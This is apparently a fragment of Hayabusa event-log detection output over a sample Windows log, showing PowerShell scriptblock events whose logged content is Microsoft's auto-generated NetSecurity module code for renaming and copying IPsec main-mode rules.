[string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Gr",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"oup}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and 
(@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo 
= [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"oup}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecMainModeRule' -Alias '*' function Copy-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] 
${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, 
